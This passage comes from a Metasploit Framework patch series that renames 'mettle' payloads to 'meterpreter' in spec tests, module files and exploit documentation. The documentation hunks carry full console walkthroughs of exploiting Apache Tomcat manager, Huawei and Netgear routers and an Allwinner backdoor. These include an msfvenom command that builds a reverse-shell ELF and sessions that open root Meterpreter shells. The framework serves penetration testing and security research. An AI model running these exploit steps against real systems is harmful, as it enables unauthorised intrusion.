false, modules_pathname: modules_pathname, - reference_name: 'linux/armle/mettle_reverse_tcp' + reference_name: 'linux/armle/meterpreter_reverse_tcp' end - context 'linux/mips64/mettle_reverse_tcp' do + context 'linux/mips64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/mips64/mettle_reverse_tcp' + 'singles/linux/mips64/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mips64/mettle_reverse_tcp' + reference_name: 'linux/mips64/meterpreter_reverse_tcp' end - context 'linux/mipsbe/mettle/reverse_tcp' do + context 'linux/mipsbe/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/mipsbe/reverse_tcp', - 'stages/linux/mipsbe/mettle' + 'stages/linux/mipsbe/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsbe/mettle/reverse_tcp' + reference_name: 'linux/mipsbe/meterpreter/reverse_tcp' end - context 'linux/mipsbe/mettle_reverse_tcp' do + context 'linux/mipsbe/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/mipsbe/mettle_reverse_tcp' + 'singles/linux/mipsbe/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsbe/mettle_reverse_tcp' + reference_name: 'linux/mipsbe/meterpreter_reverse_tcp' end - context 'linux/mipsle/mettle/reverse_tcp' do + context 'linux/mipsle/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/mipsle/reverse_tcp', - 'stages/linux/mipsle/mettle' + 'stages/linux/mipsle/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsle/mettle/reverse_tcp' + reference_name: 'linux/mipsle/meterpreter/reverse_tcp' end - context 
'linux/mipsle/mettle_reverse_tcp' do + context 'linux/mipsle/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/mipsle/mettle_reverse_tcp' + 'singles/linux/mipsle/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsle/mettle_reverse_tcp' + reference_name: 'linux/mipsle/meterpreter_reverse_tcp' end - context 'linux/ppc/mettle_reverse_tcp' do + context 'linux/ppc/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/ppc/mettle_reverse_tcp' + 'singles/linux/ppc/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/ppc/mettle_reverse_tcp' + reference_name: 'linux/ppc/meterpreter_reverse_tcp' end - context 'linux/ppc64le/mettle_reverse_tcp' do + context 'linux/ppc64le/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/ppc64le/mettle_reverse_tcp' + 'singles/linux/ppc64le/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/ppc64le/mettle_reverse_tcp' + reference_name: 'linux/ppc64le/meterpreter_reverse_tcp' end - context 'linux/x64/mettle/bind_tcp' do + context 'linux/x64/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x64/bind_tcp', - 'stages/linux/x64/mettle' + 'stages/linux/x64/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x64/mettle/bind_tcp' + reference_name: 'linux/x64/meterpreter/bind_tcp' end - context 'linux/x64/mettle/reverse_tcp' do + context 'linux/x64/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x64/reverse_tcp', - 
'stages/linux/x64/mettle' + 'stages/linux/x64/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x64/mettle/reverse_tcp' + reference_name: 'linux/x64/meterpreter/reverse_tcp' end - context 'linux/x64/mettle_reverse_tcp' do + context 'linux/x64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/x64/mettle_reverse_tcp' + 'singles/linux/x64/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x64/mettle_reverse_tcp' + reference_name: 'linux/x64/meterpreter_reverse_tcp' end - context 'linux/x86/mettle/bind_ipv6_tcp' do + context 'linux/x86/meterpreter/bind_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_ipv6_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_ipv6_tcp' + reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp' end - context 'linux/x86/mettle/bind_ipv6_tcp_uuid' do + context 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_ipv6_tcp_uuid', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_ipv6_tcp_uuid' + reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' end - context 'linux/x86/mettle/bind_nonx_tcp' do + context 'linux/x86/meterpreter/bind_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_nonx_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_nonx_tcp' + reference_name: 
'linux/x86/meterpreter/bind_nonx_tcp' end - context 'linux/x86/mettle/bind_tcp' do + context 'linux/x86/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_tcp' + reference_name: 'linux/x86/meterpreter/bind_tcp' end - context 'linux/x86/mettle/bind_tcp_uuid' do + context 'linux/x86/meterpreter/bind_tcp_uuid' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_tcp_uuid', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_tcp_uuid' + reference_name: 'linux/x86/meterpreter/bind_tcp_uuid' end - context 'linux/x86/mettle/find_tag' do + context 'linux/x86/meterpreter/find_tag' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/find_tag', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/find_tag' + reference_name: 'linux/x86/meterpreter/find_tag' end - context 'linux/x86/mettle/reverse_ipv6_tcp' do + context 'linux/x86/meterpreter/reverse_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_ipv6_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_ipv6_tcp' + reference_name: 'linux/x86/meterpreter/reverse_ipv6_tcp' end - context 'linux/x86/mettle/reverse_nonx_tcp' do + context 'linux/x86/meterpreter/reverse_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: 
[ 'stagers/linux/x86/reverse_nonx_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_nonx_tcp' + reference_name: 'linux/x86/meterpreter/reverse_nonx_tcp' end - context 'linux/x86/mettle/reverse_tcp' do + context 'linux/x86/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_tcp' + reference_name: 'linux/x86/meterpreter/reverse_tcp' end - context 'linux/x86/mettle/reverse_tcp_uuid' do + context 'linux/x86/meterpreter/reverse_tcp_uuid' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_tcp_uuid', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_tcp_uuid' + reference_name: 'linux/x86/meterpreter/reverse_tcp_uuid' end - context 'linux/x86/mettle_reverse_tcp' do + context 'linux/x86/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/x86/mettle_reverse_tcp' + 'singles/linux/x86/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle_reverse_tcp' + reference_name: 'linux/x86/meterpreter_reverse_tcp' end - context 'linux/zarch/mettle_reverse_tcp' do + context 'linux/zarch/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/zarch/mettle_reverse_tcp' + 'singles/linux/zarch/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 
'linux/zarch/mettle_reverse_tcp' + reference_name: 'linux/zarch/meterpreter_reverse_tcp' end end From 078ba66e5f32c7f9bc0e377791e40bfa6f6cf1ff Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 17:17:20 -0500 Subject: [PATCH 3/7] remove unneeded msf/core requires --- modules/payloads/stages/linux/armle/meterpreter.rb | 1 - modules/payloads/stages/linux/mipsbe/meterpreter.rb | 1 - modules/payloads/stages/linux/mipsle/meterpreter.rb | 1 - modules/payloads/stages/linux/x64/meterpreter.rb | 1 - modules/payloads/stages/linux/x86/meterpreter.rb | 1 - 5 files changed, 5 deletions(-) diff --git a/modules/payloads/stages/linux/armle/meterpreter.rb b/modules/payloads/stages/linux/armle/meterpreter.rb index 8b72c0e9e5..ce1deb0ac1 100644 --- a/modules/payloads/stages/linux/armle/meterpreter.rb +++ b/modules/payloads/stages/linux/armle/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_armle_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/mipsbe/meterpreter.rb b/modules/payloads/stages/linux/mipsbe/meterpreter.rb index e6d3884209..43165d930c 100644 --- a/modules/payloads/stages/linux/mipsbe/meterpreter.rb +++ b/modules/payloads/stages/linux/mipsbe/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_mipsbe_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/mipsle/meterpreter.rb b/modules/payloads/stages/linux/mipsle/meterpreter.rb index 4fe7615598..824c381d0e 100644 --- a/modules/payloads/stages/linux/mipsle/meterpreter.rb +++ b/modules/payloads/stages/linux/mipsle/meterpreter.rb 
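Review bot: The `linux/x86/metsvc_bind_tcp` and `linux/x86/metsvc_reverse_tcp` contexts are unchanged in content, yet the first hunk of this file removes them and this hunk re-adds them between `linux/x86/meterpreter_reverse_https` and `linux/zarch/meterpreter_reverse_http`, in the middle of the Meterpreter block. Leaving them where they were would keep the diff limited to the mettle-to-meterpreter rename and the new http/https contexts. The new `meterpreter_reverse_http`/`_https` contexts are also listed ahead of the `meterpreter_reverse_tcp` ones for the same architectures, so entries for one architecture are no longer adjacent; if this order is what a generator emits, a sentence in the commit message saying so would spare the next reader the question.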
@@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_mipsle_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/x64/meterpreter.rb b/modules/payloads/stages/linux/x64/meterpreter.rb index 38b5defb53..de37deca83 100644 --- a/modules/payloads/stages/linux/x64/meterpreter.rb +++ b/modules/payloads/stages/linux/x64/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_x64_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 008c34eb5b..532b7779a1 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' From 12ed3dad20ecdd17f6740824f3f6979e1e0218ad Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 17:49:08 -0500 Subject: [PATCH 4/7] update documentation to point to meterpreter again --- .../linux/http/huawei_hg532n_cmdinject.md | 4 +- .../linux/http/netgear_r7000_cgibin_exec.md | 20 +++--- .../exploit/multi/http/tomcat_mgr_deploy.md | 68 +++++++++---------- .../exploit/multi/local/allwinner_backdoor.md | 8 +-- 4 files changed, 50 insertions(+), 50 deletions(-) diff --git a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md index 48209d7a72..1a832beb93 100644 --- a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md 
+++ b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md @@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access. With an attacker node that resides within the ISP network, do: -- Set `payload` to `linux/mipsbe/mettle_reverse_tcp` +- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp` - Set `RHOST` to the target router's IP @@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate the payload ELF executable using `msfvenom`: ``` -$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444 +$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444 No encoder or badchars specified, outputting raw payload Payload size: 212 bytes diff --git a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md index cc1c3d4826..6bae8bef37 100644 --- a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md @@ -17,17 +17,17 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po ## Options **PAYLOAD** - - The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh` + + The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh` ## Scenarios Sample output of a successful session: - + ``` msf exploit(netgear_r7000_cgibin_exec) > run -[*] Started reverse TCP handler on 127.0.0.1:4444 +[*] Started reverse TCP handler on 127.0.0.1:4444 [*] Router is a NETGEAR router (R7000) [+] Router may be vulnerable (NETGEAR R7000) [*] Using URL: http://0.0.0.0:8080/ 
@@ -35,16 +35,16 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600 [*] Server stopped. -meterpreter > getuid +meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 -meterpreter > sysinfo +meterpreter > sysinfo Computer : 192.168.1.4 OS : (Linux 2.6.36.4brcmarm+) Architecture : armv7l Meterpreter : armle/linux -meterpreter > +meterpreter > ``` - + As you can see, the `uid` is 0, meaning you have root access. - - + + diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md index 36f2dd0834..db7af1adde 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md @@ -32,7 +32,7 @@ For this exploitation, it was changed to simply `manager`. 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set verbose true @@ -43,7 +43,7 @@ For this exploitation, it was changed to simply `manager`. HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 - msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 
@@ -54,8 +54,8 @@ For this exploitation, it was changed to simply `manager`. msf exploit(tomcat_mgr_deploy) > check [*] 192.168.2.108:8086 The target appears to be vulnerable. msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6071 bytes as scEYoK0.war ... [!] No active DB -- Credential data will not be saved! @@ -63,12 +63,12 @@ For this exploitation, it was changed to simply `manager`. [*] Undeploying scEYoK0 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500 - + meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows - + ``` ### Tomcat 7 (7.0.73) @@ -96,7 +96,7 @@ Of note, the user was given `manager-gui` permissions by default. 3. Exploitation: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set path /manager/text 
@@ -111,15 +111,15 @@ Of note, the user was given `manager-gui` permissions by default. lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set rport 8087 rport => 8087 - msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 msf exploit(tomcat_mgr_deploy) > check [*] 192.168.2.108:8087 The target appears to be vulnerable. msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ... [!] No active DB -- Credential data will not be saved! @@ -127,7 +127,7 @@ Of note, the user was given `manager-gui` permissions by default. [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500 - + meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) @@ -159,12 +159,12 @@ Of note, the user was given `manager-gui` permissions by default. 3. Exploitation: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set rport 8088 rport => 8088 - msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 
@@ -178,15 +178,15 @@ Of note, the user was given `manager-gui` permissions by default. msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... [*] Undeploying c6TYmkd8YAe8LqKQhSCr ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 - + meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) @@ -215,7 +215,7 @@ Of note, the user was given `manager-gui` permissions by default. 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 rhost => 192.168.2.156 msf exploit(tomcat_mgr_deploy) > set rport 8080 @@ -226,15 +226,15 @@ Of note, the user was given `manager-gui` permissions by default. HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat - msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp - payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... [!] No active DB -- Credential data will not be saved! 
@@ -243,7 +243,7 @@ Of note, the user was given `manager-gui` permissions by default. [*] Sending stage (335800 bytes) to 192.168.2.156 [*] Undeploying 9bj4IYa66cSpdK ... [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 - + meterpreter > sysinfo Computer : Ubuntu14.04 OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) @@ -273,15 +273,15 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_deploy) > set rport 8087 rport => 8087 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 - msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp - payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat @@ -294,8 +294,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... [!] No active DB -- Credential data will not be saved! 
@@ -304,7 +304,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 - + meterpreter > sysinfo Computer : 192.168.2.118 OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) @@ -335,15 +335,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_deploy) > set rport 8088 rport => 8088 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 - msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp - payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat @@ -355,8 +355,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... [!] No active DB -- Credential data will not be saved! 
@@ -365,7 +365,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 - + meterpreter > sysinfo Computer : 192.168.2.118 OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) diff --git a/documentation/modules/exploit/multi/local/allwinner_backdoor.md b/documentation/modules/exploit/multi/local/allwinner_backdoor.md index 230c8918e2..7c3087621d 100644 --- a/documentation/modules/exploit/multi/local/allwinner_backdoor.md +++ b/documentation/modules/exploit/multi/local/allwinner_backdoor.md @@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true verbose => true msf exploit(allwinner_backdoor) > set session 1 session => 1 -msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp -payload => linux/armle/mettle/reverse_tcp +msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp +payload => linux/armle/meterpreter/reverse_tcp msf exploit(allwinner_backdoor) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(allwinner_backdoor) > check @@ -50,7 +50,7 @@ msf exploit(allwinner_backdoor) > exploit ## Successful exploitation: ``` -[*] Started reverse TCP handler on 192.168.2.117:4444 +[*] Started reverse TCP handler on 192.168.2.117:4444 [*] Transmitting intermediate stager...(136 bytes) [*] Sending stage (374540 bytes) to 192.168.2.248 [+] Backdoor Found, writing payload to /tmp/odzVx.elf @@ -68,4 +68,4 @@ Computer : 192.168.2.248 OS : Ubuntu 14.04 (Linux 3.4.39) Architecture : armv7l Meterpreter : armle/linux -``` \ No newline at end of file +``` From a60e5789ed184f0b64d64fb1df299a1477185e97 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Wed, 26 Apr 2017 17:55:10 -0500 Subject: [PATCH 5/7] update mettle->meterpreter references in modules --- .../exploits/android/browser/stagefright_mp4_tx3g_64bit.rb | 6 ++---- modules/exploits/android/local/futex_requeue.rb | 5 +---- modules/exploits/android/local/put_user_vroot.rb | 5 +---- modules/exploits/linux/http/dlink_hnap_login_bof.rb | 6 ++---- modules/exploits/linux/http/huawei_hg532n_cmdinject.rb | 3 +-- modules/exploits/linux/http/mvpower_dvr_shell_exec.rb | 2 +- modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb | 6 ++---- modules/exploits/linux/local/bpf_priv_esc.rb | 6 ++---- modules/exploits/linux/local/ntfs3g_priv_esc.rb | 6 ++---- modules/exploits/multi/local/allwinner_backdoor.rb | 4 +--- 10 files changed, 15 insertions(+), 34 deletions(-) diff --git a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb index 5e40121d5a..72f037d167 100644 --- a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb +++ b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking @@ -67,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Space' => 2048, 'DisableNops' => true, }, - #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp' }, + #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' }, 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], # TODO: , 